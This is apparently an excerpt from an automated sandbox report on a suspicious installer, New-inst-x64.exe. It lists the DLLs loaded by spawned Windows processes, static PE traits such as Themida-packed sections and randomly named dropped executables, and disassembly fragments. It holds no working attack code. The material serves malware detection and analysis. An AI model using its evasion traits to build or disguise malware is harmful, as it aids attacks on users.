      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeSection loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: New-inst-x64.exeStatic PE information: More than 8191 > 100 exports found
      Source: New-inst-x64.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: New-inst-x64.exeStatic file information: File size 57894039 > 1048576
      Source: New-inst-x64.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xe04c00
      Source: New-inst-x64.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2809000
      Source: New-inst-x64.exeStatic PE information: More than 200 imports for KERNEL32.dll
      Source: New-inst-x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: New-inst-x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: New-inst-x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: New-inst-x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: New-inst-x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: New-inst-x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: New-inst-x64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: New-inst-x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: New-inst-x64.exe, 00000000.00000000.1171874817.000000000306D000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: New-inst-x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: New-inst-x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: New-inst-x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: New-inst-x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: New-inst-x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: mbtbiqwunmmmyby.exe.0.drStatic PE information: 0xA9D5AF7D [Fri Apr 16 15:06:37 2060 UTC]
      Source: initial sampleStatic PE information: section where entry point is pointing to: .themida
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: section name: .themida
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.drStatic PE information: section name:
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C1C6FF push edx; iretd 0_3_09C1C701
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C1FB14 push eax; ret 0_3_09C1FB15
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C19B3D push ds; iretd 0_3_09C19B3E
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C381C8 push 68C809C3h; ret 0_3_09C381CE
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C351E1 push ecx; ret 0_3_09C351E2
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C351E5 push ecx; ret 0_3_09C351E6
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C369E5 pushad ; ret 0_3_09C369E6
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C369E8 pushad ; ret 0_3_09C369EE
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C351FC push ecx; ret 0_3_09C351FE
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C38180 pushad ; ret 0_3_09C38186
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C3718C push edi; ret 0_3_09C37192
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C35199 push ecx; ret 0_3_09C3519A
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C36998 push esi; ret 0_3_09C3699A
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C3699D push edi; ret 0_3_09C3699E
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C36148 push edi; ret 0_3_09C36152
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C3817D pushad ; ret 0_3_09C3817E
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C35900 push edi; ret 0_3_09C35902
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C37124 push edi; ret 0_3_09C3712A
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C37130 push edi; ret 0_3_09C37132
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C38130 push esi; ret 0_3_09C38132
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C38135 push edi; ret 0_3_09C38136
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C260D7 pushad ; retn 0009h0_3_09C260DA
      Source: C:\Users\user\Desktop\New-inst-x64.exeCode function: 0_3_09C368D4 push 67F809C3h; ret 0_3_09C368DE
